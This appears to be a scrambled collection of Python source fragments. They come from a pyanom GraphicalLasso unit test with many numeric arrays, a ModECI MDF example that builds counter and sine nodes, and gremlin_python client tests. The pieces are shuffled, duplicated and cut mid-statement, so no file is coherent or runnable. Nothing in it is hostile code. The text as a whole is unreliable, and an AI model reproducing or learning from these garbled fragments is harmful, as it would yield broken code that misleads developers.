target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape, (20, 3)) def test_incorrect_feature_size(self): X_normal =", "[0.425213005, 0.796156033, 1.676164975]]) self.X_error = np.array([[-0.273095586, 0.356336588, 1.595876828], [-0.708547003, -0.572139833,", "-1.304668238, -0.599247488], [-0.503171745, -1.308368748, -1.451411048], [-0.904446243, -0.287837582, 0.197153592], [-1.106120624, 0.243612535,", "-1.031919195, 1.227285333], [-0.774019674, 0.241245625, -0.989132941], [1.298381426, 0.19445334, 2.267355363], [1.46892843, 1.24946146,", "[-0.307091024, -1.56195639, 0.509095939], [0.849156845, 0.533674261, 0.069183014], [0.102812565, 8, 1.545239732]]) def", "0.710538188, 0.591089702, 0.099804538, 0.114730483]).reshape(-1, 1) X_error = np.array([0.660985506, -1.450512173, -1.27733756,", "= self._makeOne() with self.assertRaises(ValueError): target.fit(X_normal) def test_anomaly_analysis_score_shape(self): target = self._makeOne()", "-0.846863556], [0.632918214, 1.35895507, -1.217528827], [0.017011646, 1.556247275, -0.149119024], [-1.129336215, 0.486811944, 0.012272206],", "10, 2.544472412], [-0.754827534, -1.031919195, 1.227285333], [-0.774019674, 0.241245625, -0.989132941], [1.298381426, 0.19445334,", "-0.149119024], [-1.129336215, 0.486811944, 0.012272206], [0.498967152, -0.530065628, -2.14011938], [0.402460108, -0.474465633, -0.041584595],", "[-0.861682655, 1.472544046, -0.846863556], [0.632918214, 1.35895507, -1.217528827], [0.017011646, 1.556247275, -0.149119024], [-1.129336215,", "class TestGraphicalLasso(unittest.TestCase): \"\"\"Basic test cases.\"\"\" def _getTarget(self): from pyanom.structure_learning import", "[-1.342349795, -0.147133485, 1.286410605], [-0.546153552, 0.134343445, -0.380672316], [-2.264867999, 0.227795362, 1.477762968], [0.070095074,", "0.492444331, 0.234015505], [-0.307091024, -1.56195639, 0.509095939], [0.849156845, 0.533674261, 0.069183014], [0.102812565, 8,", "-0.147133485, 1.286410605], [-0.546153552, 0.134343445, -0.380672316], [-2.264867999, 0.227795362, 1.477762968], [0.070095074, -0.770899782,", "-1.217528827], [0.017011646, 1.556247275, -0.149119024], [-1.129336215, 0.486811944, 0.012272206], [0.498967152, -0.530065628, -2.14011938],", "target = self._makeOne() with self.assertRaises(ValueError): target.fit(X_normal) def test_anomaly_analysis_score_shape(self): target =", "-1.308368748, -1.451411048], [-0.904446243, -0.287837582, 0.197153592], [-1.106120624, 0.243612535, 1.051237763], [0.371920628, 1.690566027,", "def setUpClass(self): self.X_normal = np.array([[0.975586009, -0.745997359, -0.229331244], [-0.460992487, -1.304668238, -0.599247488],", "-1.27733756, -1.420294211, 0.737179562, 1.481425898, -0.170147132, -1.527687346, 0.580282631, -3.722489636]).reshape(-1, 1) target", "-0.229331244], [-0.460992487, -1.304668238, -0.599247488], [-0.503171745, -1.308368748, -1.451411048], [-0.904446243, -0.287837582, 0.197153592],", "<gh_stars>0 import io import unittest import numpy as np class", "TestGraphicalLasso(unittest.TestCase): \"\"\"Basic test cases.\"\"\" def _getTarget(self): from pyanom.structure_learning import GraphicalLasso", "1) X_error = np.array([0.660985506, -1.450512173, -1.27733756, -1.420294211, 0.737179562, 1.481425898, -0.170147132,", "unittest import numpy as np class TestGraphicalLasso(unittest.TestCase): \"\"\"Basic test cases.\"\"\"", "test_outlier_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred = target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape, (20,", "pmatrix = target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape, (3, )) self.assertEqual(pmatrix.shape, (3, 3)) if", "-1.295306533], [0.499065038, -1.064179225, 1.243325767], [0.452740621, -0.737171777, 0.352807563], [0.626897927, -1.100559392, -0.905560876],", "1.286410605], [-0.546153552, 0.134343445, -0.380672316], [-2.264867999, 0.227795362, 1.477762968], [0.070095074, -0.770899782, 2.100831522],", "target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape, (20, 3)) def test_incorrect_feature_size(self): X_normal = np.array([-0.056523959, -", "-0.249935965, 0.186624902, -0.30183287, 2.000815584, 0.710538188, 0.591089702, 0.099804538, 0.114730483]).reshape(-1, 1) X_error", "8, 1.545239732]]) def test_outlier_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred =", "self.assertRaises(ValueError): target.fit(X_normal) def test_anomaly_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred, pmatrix", "0.35980022], [0.653070988, -0.052417831, 0.787284547], [-1.059131881, 1.621161051, -1.295306533], [0.499065038, -1.064179225, 1.243325767],", "[0.632918214, 1.35895507, -1.217528827], [0.017011646, 1.556247275, -0.149119024], [-1.129336215, 0.486811944, 0.012272206], [0.498967152,", "[-1.059131881, 1.621161051, -1.295306533], [0.499065038, -1.064179225, 1.243325767], [0.452740621, -0.737171777, 0.352807563], [0.626897927,", "-0.170147132, -1.527687346, 0.580282631, -3.722489636]).reshape(-1, 1) target = self._makeOne() with self.assertRaises(ValueError):", "-0.846614104, -0.355396321], [0.810670486, -0.719804484, -0.943762163], [1.169028226, 0.492444331, 0.234015505], [-0.307091024, -1.56195639,", "np.array([-0.056523959, - 0.881470896, -0.249935965, 0.186624902, -0.30183287, 2.000815584, 0.710538188, 0.591089702, 0.099804538,", "-1.321443286], [0.963425438, -1.136873938, 0.990406269], [-1.342349795, -0.147133485, 1.286410605], [-0.546153552, 0.134343445, -0.380672316],", "1.690566027, -0.468645532], [-0.861682655, 1.472544046, -0.846863556], [0.632918214, 1.35895507, -1.217528827], [0.017011646, 1.556247275,", "0.234015505], [-0.307091024, -1.56195639, 0.509095939], [0.849156845, 0.533674261, 0.069183014], [0.102812565, 8, 1.545239732]])", "def _makeOne(self, *args, **kwargs): return self._getTarget()(*args, **kwargs) @classmethod def setUpClass(self):", "[0.498967152, -0.530065628, -2.14011938], [0.402460108, -0.474465633, -0.041584595], [-0.847994655, -1.281269721, -0.430338406], [-0.583857254,", "0.186624902, -0.30183287, 2.000815584, 0.710538188, 0.591089702, 0.099804538, 0.114730483]).reshape(-1, 1) X_error =", "(20, 3)) def test_incorrect_feature_size(self): X_normal = np.array([-0.056523959, - 0.881470896, -0.249935965," ]
[ "t += dt if \"-nogui\" not in sys.argv: import matplotlib.pyplot", "sys.argv: verbose = True # verbose = False from modeci_mdf.utils", "matplotlib.pyplot as plt plt.plot(times, s) plt.show() if \"-graph\" in sys.argv:", "= 2 t = 0 recorded = {} times =", "\"-run\" in sys.argv: verbose = True # verbose = False", "p2 = Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\",", "value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 *", "mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in sys.argv:", "= Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id)", "import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt = 0.01 duration", "verbose = False from modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine", "dt = 0.01 duration = 2 t = 0 recorded", "modeci_mdf.mdf import * import sys def main(): mod = Model(id=\"States\")", "s = [] while t <= duration: times.append(t) print(\"====== Evaluating", "variables \"\"\" from modeci_mdf.mdf import * import sys def main():", "% mod.id) if \"-run\" in sys.argv: verbose = True #", "value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id)", "/ period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp * level\")", "of this doesn't fail on Windows on GitHub Actions )", "s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\" not in sys.argv: import", "sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes", "state variables \"\"\" from modeci_mdf.mdf import * import sys def", "duration: times.append(t) print(\"====== Evaluating at t = %s ======\" %", "s) plt.show() if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False,", "if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\",", "default_initial_value=0, time_derivative=\"6.283185 * rate / period\" ) sine_node.parameters.append(s1) s2 =", "increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine", "replace with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if", "= Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 * level /", "mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\"", "= OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\"", "= Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node", "= Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count + increment\")", "EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt = 0.01 duration =", "level / period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp *", "in sys.argv: verbose = True # verbose = False from", "from modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph eg", "+ increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ##", "verbose) dt = 0.01 duration = 2 t = 0", "(t)) if t == 0: eg.evaluate() # replace with initialize?", "s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate / period\"", "= %s ======\" % (t)) if t == 0: eg.evaluate()", "t == 0: eg.evaluate() # replace with initialize? else: eg.evaluate(time_increment=dt)", "import * import sys def main(): mod = Model(id=\"States\") mod_graph", "eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\" not in sys.argv:", "sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter(", "times = [] s = [] while t <= duration:", "## Sine node... sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4))", "t <= duration: times.append(t) print(\"====== Evaluating at t = %s", "Testing state variables \"\"\" from modeci_mdf.mdf import * import sys", "## Counter node counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1)", "= Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\",", "from modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt =", "modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph eg =", "\"-nogui\" not in sys.argv: import matplotlib.pyplot as plt plt.plot(times, s)", "plt plt.plot(times, s) plt.show() if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\",", "Windows on GitHub Actions ) return mod_graph if __name__ ==", "% mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in", "False from modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph", "2 t = 0 recorded = {} times = []", ") sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185", "level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file =", "in sys.argv: import matplotlib.pyplot as plt plt.plot(times, s) plt.show() if", "\"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True,", "only_warn_on_fail=True, # Makes sure test of this doesn't fail on", "if t == 0: eg.evaluate() # replace with initialize? else:", "[] while t <= duration: times.append(t) print(\"====== Evaluating at t", "sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file", "mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" %", "= OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... sine_node =", "0: eg.evaluate() # replace with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t", "value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\",", "doesn't fail on Windows on GitHub Actions ) return mod_graph", "* level / period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp", "sys def main(): mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph)", "[] s = [] while t <= duration: times.append(t) print(\"======", "while t <= duration: times.append(t) print(\"====== Evaluating at t =", "* level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file", "plt.plot(times, s) plt.show() if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\",", "plt.show() if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3,", "# Makes sure test of this doesn't fail on Windows", "- Testing state variables \"\"\" from modeci_mdf.mdf import * import", "% (t)) if t == 0: eg.evaluate() # replace with", "Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1)", "level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure test of this doesn't", "new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in sys.argv: verbose", "sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 *", "= [] s = [] while t <= duration: times.append(t)", "* 6.283185 * level / period\", ) sine_node.parameters.append(s2) op1 =", "eg.evaluate() # replace with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t +=", "0.01 duration = 2 t = 0 recorded = {}", "on GitHub Actions ) return mod_graph if __name__ == \"__main__\":", "period\" ) sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 *", "* rate / period\" ) sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\",", "Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 * level / period\",", "import load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph,", "Evaluating at t = %s ======\" % (t)) if t", "= {} times = [] s = [] while t", "op1 = OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file =", "in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, #", "value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1", "t = 0 recorded = {} times = [] s", "view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure test of this", "= mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in sys.argv: verbose =", "OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" %", "def main(): mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ##", "Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2)", "with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\"", "* import sys def main(): mod = Model(id=\"States\") mod_graph =", "this doesn't fail on Windows on GitHub Actions ) return", "Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node = Node(id=\"counter_node\") p1 =", "0 recorded = {} times = [] s = []", "main(): mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter", "print_summary from modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt", "Makes sure test of this doesn't fail on Windows on", "from modeci_mdf.mdf import * import sys def main(): mod =", "Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node =", "counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1 =", "mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node = Node(id=\"counter_node\")", "dt if \"-nogui\" not in sys.argv: import matplotlib.pyplot as plt", "mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure", "mod.graphs.append(mod_graph) ## Counter node counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\",", "mod.id) if \"-run\" in sys.argv: verbose = True # verbose", "import sys def main(): mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\")", "mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in sys.argv: verbose = True", "period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1)", "= True # verbose = False from modeci_mdf.utils import load_mdf,", "at t = %s ======\" % (t)) if t ==", "\"\"\" Example of ModECI MDF - Testing state variables \"\"\"", "Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate / period\" ) sine_node.parameters.append(s1)", "Counter node counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1)", "= [] while t <= duration: times.append(t) print(\"====== Evaluating at", "not in sys.argv: import matplotlib.pyplot as plt plt.plot(times, s) plt.show()", "True # verbose = False from modeci_mdf.utils import load_mdf, print_summary", "MDF - Testing state variables \"\"\" from modeci_mdf.mdf import *", "= mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if", "= False from modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine import", "= EvaluableGraph(mod_graph, verbose) dt = 0.01 duration = 2 t", "mod_graph.nodes.append(counter_node) ## Sine node... sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\",", "filename_root=\"states\", only_warn_on_fail=True, # Makes sure test of this doesn't fail", "as plt plt.plot(times, s) plt.show() if \"-graph\" in sys.argv: mod.to_graph_image(", "# replace with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt", "= Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate / period\" )", "on Windows on GitHub Actions ) return mod_graph if __name__", "ModECI MDF - Testing state variables \"\"\" from modeci_mdf.mdf import", "load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose)", "\"\"\" from modeci_mdf.mdf import * import sys def main(): mod", "======\" % (t)) if t == 0: eg.evaluate() # replace", "counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 =", "id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate / period\" ) sine_node.parameters.append(s1) s2", "time_derivative=\"6.283185 * rate / period\" ) sine_node.parameters.append(s1) s2 = Parameter(", "<= duration: times.append(t) print(\"====== Evaluating at t = %s ======\"", "Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0,", "times.append(t) print(\"====== Evaluating at t = %s ======\" % (t))", "engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure test", "s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 * level", "Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count", "value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate /", "t = %s ======\" % (t)) if t == 0:", "rate / period\" ) sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1,", "eg = EvaluableGraph(mod_graph, verbose) dt = 0.01 duration = 2", "= 0 recorded = {} times = [] s =", "fail on Windows on GitHub Actions ) return mod_graph if", "initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\" not", "Sine node... sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1", "value=\"count + increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node)", "= Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\",", "+= dt if \"-nogui\" not in sys.argv: import matplotlib.pyplot as", "/ period\" ) sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1", "verbose = True # verbose = False from modeci_mdf.utils import", "output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure test of", "sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate", "time_derivative=\"-1 * 6.283185 * level / period\", ) sine_node.parameters.append(s2) op1", "node counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2", "sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\"", "test of this doesn't fail on Windows on GitHub Actions", "== 0: eg.evaluate() # replace with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value)", "of ModECI MDF - Testing state variables \"\"\" from modeci_mdf.mdf", "p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count +", "new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id)", "op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... sine_node", "OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... sine_node = Node(id=\"sine_node\")", "# verbose = False from modeci_mdf.utils import load_mdf, print_summary from", "modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt = 0.01", "recorded = {} times = [] s = [] while", ") sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node)", "id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 * level / period\", )", "sys.argv: import matplotlib.pyplot as plt plt.plot(times, s) plt.show() if \"-graph\"", "EvaluableGraph(mod_graph, verbose) dt = 0.01 duration = 2 t =", "default_initial_value=1, time_derivative=\"-1 * 6.283185 * level / period\", ) sine_node.parameters.append(s2)", "if \"-run\" in sys.argv: verbose = True # verbose =", "= Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node = Node(id=\"counter_node\") p1", "import matplotlib.pyplot as plt plt.plot(times, s) plt.show() if \"-graph\" in", "6.283185 * level / period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\",", "Example of ModECI MDF - Testing state variables \"\"\" from", "else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\" not in", "if \"-nogui\" not in sys.argv: import matplotlib.pyplot as plt plt.plot(times,", "mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node", "sure test of this doesn't fail on Windows on GitHub", "node... sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 =", "counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node...", "duration = 2 t = 0 recorded = {} times", "%s ======\" % (t)) if t == 0: eg.evaluate() #", "GitHub Actions ) return mod_graph if __name__ == \"__main__\": main()", "print(\"====== Evaluating at t = %s ======\" % (t)) if", "counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3))", "= 0.01 duration = 2 t = 0 recorded =", "{} times = [] s = [] while t <=", "sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185" ]
[ "test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x': 2}).all().result()[0] == 4 def", "in ex.status_attributes assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite", "gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import Graph __author__ = '<NAME>", "# test perspective because there's no way to access the", "def test_iterate_result_set(client): g = Graph().traversal() t = g.V() message =", "really validate this from an integration # test perspective because", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = secure_client.submit(message)", "t = g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "t.bytecode, 'aliases': {'g': 'g'}}) result_set = client.submit(message) results = []", "pool `future` may or may not be done here result_set", "pool size to be 1 again after query returned assert", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin':", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) assert", "client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) ==", "client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) == 6 # with", "client.submit(message) assert len(result_set.all().result()) == 6 ## t = g.with_(\"x\", \"test\").with_(\"y\",", "limitations under the License. ''' import pytest from gremlin_python.driver.protocol import", "connection pool `future` may or may not be done here", "Foundation (ASF) under one or more contributor license agreements. See", "2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def", "fire an exception client.submit('1/0').all().result() assert False except GremlinServerError as ex:", "True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})", "assert False except GremlinServerError as ex: assert 'exceptions' in ex.status_attributes", "more contributor license agreements. See the NOTICE file distributed with", "== 6 # This future has to finish for the", "'aliases': {'g': 'g'}}) result_set = client.submit(message) results = [] for", "exception client.submit('1/0').all().result() assert False except GremlinServerError as ex: assert 'exceptions'", "t = g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "assert len(results) == 1 t = g.V().limit(10) message = RequestMessage('traversal',", "Apache License, Version 2.0 (the \"License\"); you may not use", "IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "to you under the Apache License, Version 2.0 (the \"License\");", "result in result_set: results += result assert len(results) == 10000", "serialization of OptionsStrategy. no way to really validate this from", "of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law", "1 again after query returned assert gse.status_code == 597 assert", "== 100 t = g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin':", "test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin',", "def test_client_async(client): g = Graph().traversal() t = g.V() message =", "= g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "again after query returned assert gse.status_code == 597 assert client.available_pool_size", "results += result assert len(results) == 10 t = g.V().limit(100)", "test_client_bytecode_options(client): # smoke test to validate serialization of OptionsStrategy. no", "= g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin': 